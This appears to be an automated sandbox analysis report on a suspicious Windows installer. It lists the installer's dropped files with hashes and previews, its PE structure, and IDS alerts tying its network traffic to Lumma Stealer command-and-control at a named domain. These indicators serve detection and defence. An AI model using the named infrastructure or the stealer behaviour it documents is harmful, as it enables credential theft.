Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t. .x.s.i.:.s.c.h.e.m.a.L.o.c.a.t.i.o.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s. .e.v.e.n.t.m.a.n...x.s.d.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s.". .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s.". .x.m.l.n.s.:.x.s.i.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.-.i.n.s.t.a.n.c.e.". .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.". .x.m.l.n.s.:.t.r.a.c.e.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.t.r.a.c.e.".>.......<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>.........<.e.v.e.n.t.s.>...........<.p.r.o.v.i.d.e.r. .n.a.m.e.=.".N.V.I.D.I.A.

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1081896
Entropy (8bit):	6.388045515573479
Encrypted:	false
SSDEEP:	12288:2yreuN4w1fUww+h7w1t3rykcmM/SWzWglboG/mTq3fNuPF67HGC5SYCM:DNBZ/gE3mM/SWWsbT/cq3fNuGGC5SYCM
MD5:	4CB4AA663071A4461290D2CC0AB5407E
SHA1:	96BC4504C025F3D9BD11B3D541401D69CF81126D
SHA-256:	3C7E2F14C47388A84F016408668834D9388C294C791296CAE81DA4581DD1FAFC
SHA-512:	88284D66651A7923D92898C3D4105CB69E5F90AD49BE547C94FA9C5254DDCE3A3626234211FBA7ED5400E671AC8B50D52CEF4EF59203511C27A2A39C202CF83D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ti..5...5...5...S...5...S...5...S..05...k...5...k...5...k...5...S...5...S...5...5...4..-k...5..-k...5...5...5..-k...5..Rich.5..........PE..d...8..c.........."................. ..........@.....................................l....`.................................................P...P........d.......~...\..(&......T.......p...................P...(...`................................................text............................... ..`.rdata...b.......d..................@..@.data........0...@..................@....pdata...~...........V..............@..@.didat..x....`......................@....tls.........p......................@....rsrc....d.......f..................@..@.reloc..T............B..............@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvinstall.cmd (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	553
Entropy (8bit):	4.92146093309903
Encrypted:	false
SSDEEP:	12:wKDwg7qQNLX9H/Qv/KO0zdPKiayeR3HO0zdvS/jFNxH8z:w9qqQNLX9HUUdDUd48z
MD5:	3F1A83F12B3540BBFE8DA771A322D201
SHA1:	747639FEB46633B130D3D0BA54DEFD564D460991
SHA-256:	27F6077CAC271727410E23493E3E2A0F84A0B0BED9A36F6BC48A9FA1E35BD155
SHA-512:	B53950268CD058E4450CD443439DDE84A9EC609DE1B10D77270B0442259F875142FDE6DA17843B1EF95FF91BDD45ACF735BBD44E43E6A50467305339B15D41EF
Malicious:	false
Preview:	@echo off..setlocal..REM Run this script from an admininistrator prompt to install NVIDIA ETW tracing....echo Installing NVIDIA Display Driver ETW Manifest manifest.......REM Uninstall existing manifest first..wevtutil.exe uninstall-manifest "ddETWExternal.xml"....REM Copy the ETW resource to system directory..xcopy /y /f ddETWExternal.dll %WINDIR%\System32\....REM Install the new manifest..wevtutil.exe install-manifest "ddETWExternal.xml"....REM Ensure that the provider was installed successfully..wevtutil get-publisher NVIDIA-DD-External > nul..

C:\Users\user\AppData\Local\hangbird\Updater.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	943784
Entropy (8bit):	6.621472142472864
Encrypted:	false
SSDEEP:	24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
MD5:	3F58A517F1F4796225137E7659AD2ADB
SHA1:	E264BA0E9987B0AD0812E5DD4DD3075531CFE269
SHA-256:	1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
SHA-512:	ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..\|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................\|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\hangbird\caliculus.csv (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	data
Category:	dropped
Size (bytes):	62696
Entropy (8bit):	7.997465407479189
Encrypted:	true
SSDEEP:	1536:DRJTbCqFC3mhFOwLah/4qYkDwlAzIbU7BoDwUIi1OgEYgdFGA:1tblFbGwLa2kEloOwwVEYo/
MD5:	025C4F4147CDF2A529ABA92B249A86AA
SHA1:	A83259F31F6E78ACB9F01EB5880C72DD9CE435E7
SHA-256:	5620E7C13F5C8B19C02FB1C1C27ECEEB88FEA23598411704563C3129093B862D
SHA-512:	6A2F4443700E0AB26247C923287AC2A78CBB032457398951877F75D1CDFBCC1F417833D083DCCC37E2D772B0DC36CDA3E71EC41F0DDC451AECC6BAFC15157419
Malicious:	false
Preview:	.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............+..Kub7.+..Kub7kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .oz.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~....t...6.....q.+....]7.+..Aab7m...........5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.

C:\Users\user\AppData\Local\hangbird\caliculus.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	data
Category:	dropped
Size (bytes):	510574
Entropy (8bit):	6.622727339019667
Encrypted:	false
SSDEEP:	12288:q40MCF2RHzA4JoHwatPBVd1LCoD1aE/and8as/CmbO:30MCFmyQoJVjNaYa/mbO
MD5:	BD2302F160B9895DD7BCF9C7DFA9BEA7
SHA1:	8FCB264280A30CC5F959D54AE75AE394054CA5A0
SHA-256:	3EAFF063360A89395B52681248A64AA2A8ACCA6DA13EAA0194DB004FA2A612C0
SHA-512:	2847C9E4233A5F5A662027D46EE04EB4D79AD937FBDDDC54B16E72547E34414094FF56BC08016FCF31BA5769CFCA2D7849AD3EDEA438C57B34402F1E105852E6
Malicious:	false
Preview:	P)y............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P)y......................................

C:\Users\user\AppData\Local\hangbird\is-7LJOT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	943784
Entropy (8bit):	6.621472142472864
Encrypted:	false
SSDEEP:	24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
MD5:	3F58A517F1F4796225137E7659AD2ADB
SHA1:	E264BA0E9987B0AD0812E5DD4DD3075531CFE269
SHA-256:	1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
SHA-512:	ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..\|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................\|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\hangbird\is-8EU3L.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	data
Category:	dropped
Size (bytes):	510574
Entropy (8bit):	6.622727339019667
Encrypted:	false
SSDEEP:	12288:q40MCF2RHzA4JoHwatPBVd1LCoD1aE/and8as/CmbO:30MCFmyQoJVjNaYa/mbO
MD5:	BD2302F160B9895DD7BCF9C7DFA9BEA7
SHA1:	8FCB264280A30CC5F959D54AE75AE394054CA5A0
SHA-256:	3EAFF063360A89395B52681248A64AA2A8ACCA6DA13EAA0194DB004FA2A612C0
SHA-512:	2847C9E4233A5F5A662027D46EE04EB4D79AD937FBDDDC54B16E72547E34414094FF56BC08016FCF31BA5769CFCA2D7849AD3EDEA438C57B34402F1E105852E6
Malicious:	false
Preview:	P)y............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P)y......................................

C:\Users\user\AppData\Local\hangbird\is-JBS10.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
File Type:	data
Category:	dropped
Size (bytes):	62696
Entropy (8bit):	7.997465407479189
Encrypted:	true
SSDEEP:	1536:DRJTbCqFC3mhFOwLah/4qYkDwlAzIbU7BoDwUIi1OgEYgdFGA:1tblFbGwLa2kEloOwwVEYo/
MD5:	025C4F4147CDF2A529ABA92B249A86AA
SHA1:	A83259F31F6E78ACB9F01EB5880C72DD9CE435E7
SHA-256:	5620E7C13F5C8B19C02FB1C1C27ECEEB88FEA23598411704563C3129093B862D
SHA-512:	6A2F4443700E0AB26247C923287AC2A78CBB032457398951877F75D1CDFBCC1F417833D083DCCC37E2D772B0DC36CDA3E71EC41F0DDC451AECC6BAFC15157419
Malicious:	false
Preview:	.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............+..Kub7.+..Kub7kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .oz.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T..-..f.....'......b~....t...6.....q.+....]7.+..Aab7m...........5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....Yt].5M".......Q..w.^5.~.o.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o...X).H*.>. .)z.....)-^.....9.....M...#..8..x.....9.i..z.=#R.=i>0..X... M..J.......u.##....Ez....U...Z8..@u.Dj....Yu?.px........(.1.0.S..@......'E.........5.8..B.;..E..q.S...f,..Z?..O..\...#B;<qr6..pw.[D.].9.G%_...........e}! .mj..?....u..6....i]&1...e..-7(VQBo....Y..6..w.'..A..=f6w,+.?..F.tA(./...h.

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	478
Entropy (8bit):	4.9404427828211634
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeT0s+sEAFSkIrxMVlmJHaVzvv:/2fAokItULVDv
MD5:	1D785D889CA617298A68D26DFEF974C4
SHA1:	1CC36474033E2767B059019B12782CE558F1EA34
SHA-256:	FE52FE8317F9F07F4AB830F6E3B1F1013BE4AA2A82DD5C86AA805648FC053230
SHA-512:	EF34C2479BE5BA45B41584887354DE53EA15EC53EA74D57042FF57EB8A609B93DAC9A55297300C29320CE14966FB7704C9952BDC7C6E2DDD0DCA929884091CF3
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.183897983146913
TrID:	Win32 Executable (generic) a (10002005/4) 98.04% Inno Setup installer (109748/4) 1.08% InstallShield setup (43055/19) 0.42% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	file.exe
File size:	6'172'760 bytes
MD5:	6fdf2cdf68ab1880aa76e7938e241fa3
SHA1:	affc9a0aea771ad101357cc728951f5938b5e4e6
SHA256:	e61ce90df13402909985f5312fdef798736eb10e0b5b6b280fb826538e7a597a
SHA512:	7e649db70d39a135cd86a837308fb304f16c904456ca3b97a70b8f8b1fd617291de8974aab3808ac67e5d2f7e9efa3840bbdeba1e3558de33587c7ff94ce231d
SSDEEP:	98304:FwREOBlkqxKUUhU5/UBovRdMwZg/nE00lNX0adDzBfoRR:POBlkqgUIufKaARR
TLSH:	5D56C006F3899025F06A063B6DA6A75096FFFE211B25C9DF32A439DC4D326914E39F13
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Certum Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	23/08/2024 09:51:29 23/08/2025 09:51:28
Subject Chain	CN=FAT\u0130H RAMAZAN \xc7IKAN, O=FAT\u0130H RAMAZAN \xc7IKAN, L=ISPARTA, C=TR
Version:	3
Thumbprint MD5:	34EEA6DC3CF94A96B6C4895174D44711
Thumbprint SHA-1:	CF51120A5C1FA97EA0B1822672435B5336F1B14D
Thumbprint SHA-256:	673240C1B1E3C03AFCA2F6EF0CC4AA765ACE7E6FC0A8C6D2F476AF5C0D46A3C3
Serial:	5E5F47BE103F0A44E83165AAD0AC77B4

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007FE4F9046325h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007FE4F90D7CABh
call 00007FE4F90D77FEh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007FE4F90D24D8h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007FE4F90403D3h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007FE4F90D3803h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007FE4F90D7D33h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007FE4F90DEA1Ah
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007FE4F90D40F8h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x11000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5e0800	0x2858
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x11000	0x11000	7297b2f9d942f6a99fa94e417cd02dea	False	0.18816061580882354	data	3.7234137464169446	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb678	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xcc0e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xcc748	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xcca30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0xccb58	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xce180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xcf028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xcf8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xcfe38	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xd1120	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xd5348	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xd78f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xd8998	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_STRING	0xd8e00	0x3f8	data			0.3198818897637795
RT_STRING	0xd91f8	0x2dc	data			0.36475409836065575
RT_STRING	0xd94d4	0x430	data			0.40578358208955223
RT_STRING	0xd9904	0x44c	data			0.38636363636363635
RT_STRING	0xd9d50	0x2d4	data			0.39226519337016574
RT_STRING	0xda024	0xb8	data			0.6467391304347826
RT_STRING	0xda0dc	0x9c	data			0.6410256410256411
RT_STRING	0xda178	0x374	data			0.4230769230769231
RT_STRING	0xda4ec	0x398	data			0.3358695652173913
RT_STRING	0xda884	0x368	data			0.3795871559633027
RT_STRING	0xdabec	0x2a4	data			0.4275147928994083
RT_RCDATA	0xdae90	0x10	data			1.5
RT_RCDATA	0xdaea0	0x310	data			0.6173469387755102
RT_RCDATA	0xdb1b0	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0xdb1dc	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xdb298	0x584	data	English	United States	0.3052407932011331
RT_MANIFEST	0xdb81c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T10:50:55.462070+0100	2057071	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site)	1	192.168.2.4	51868	1.1.1.1	53	UDP
2024-11-01T10:50:56.091683+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49739	104.21.85.194	443	TCP
2024-11-01T10:50:56.091683+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.85.194	443	TCP
2024-11-01T10:50:56.269364+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49739	104.21.85.194	443	TCP
2024-11-01T10:50:56.269364+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	104.21.85.194	443	TCP
2024-11-01T10:50:56.931094+0100	2057072	ET MALWARE Observed Win32/Lumma Stealer Related Domain (authorisev .site in TLS SNI)	1	192.168.2.4	49741	104.21.85.194	443	TCP
